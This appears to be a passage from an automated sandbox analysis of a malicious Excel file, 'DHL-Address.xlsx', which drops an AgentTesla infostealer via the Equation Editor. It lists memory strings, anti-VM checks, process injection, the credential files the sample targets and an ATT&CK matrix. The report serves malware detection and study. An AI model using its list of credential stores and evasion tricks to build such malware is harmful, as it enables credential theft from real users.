              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
              Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
              Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://jUxNbkiTmoSYxyvoDh.net
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
              Source: vbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 " t9 19 20 21 Open the doCument In If this document was 22 Micros
              Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 0 0 32 33 0 0 34 35 0 0
              .NET source code contains very large array initializationsShow sources
              Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b49EBC49Du002dB1B3u002d4ED6u002dA41Au002d329378617F94u007d/u0031A3AC0E6u002d0D4Cu002d475Fu002dB7A0u002dA416DBBA91DC.csLarge array initialization: .cctor: array initializer size 11960
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D22C2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2A98
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D75B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D75C8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2737
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2748
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001DD818
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2A88
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D60A8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D5490
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002DDA90
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D21E7
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D57D8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002DF808
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058F0D8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058CB60
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00583F30
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005873F0
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058B848
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058A020
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005826B8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00587B00
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00581B38
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058A790
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DHL-Address.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE723.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: DHL-Address.xlsxVirustotal: Detection: 47%
              Source: DHL-Address.xlsxReversingLabs: Detection: 48%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/media/image2.emf
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing2.vml.rels
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: DHL-Address.xlsxInitial sample: OLE indicators vbamacros = False

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: vbc[1].exe.2.dr, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.vbc.exe.1030000.2.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.vbc.exe.1030000.4.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005816C2 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00582290 push esp; retf 002Ch
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005803B5 push FFFFFFE8h; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.3067407255
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: DHL-Address.xlsxStream path '\x1oLe10NatIve' entropy: 7.99509276826 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9602
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -240000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2880Thread sleep time: -49517s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2868Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 3028Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep time: -120000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2240Thread sleep count: 9602 > 30
              Source: C:\Users\Public\vbc.exe TID: 2240Thread sleep count: 138 > 30
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep count: 95 > 30
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery211Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
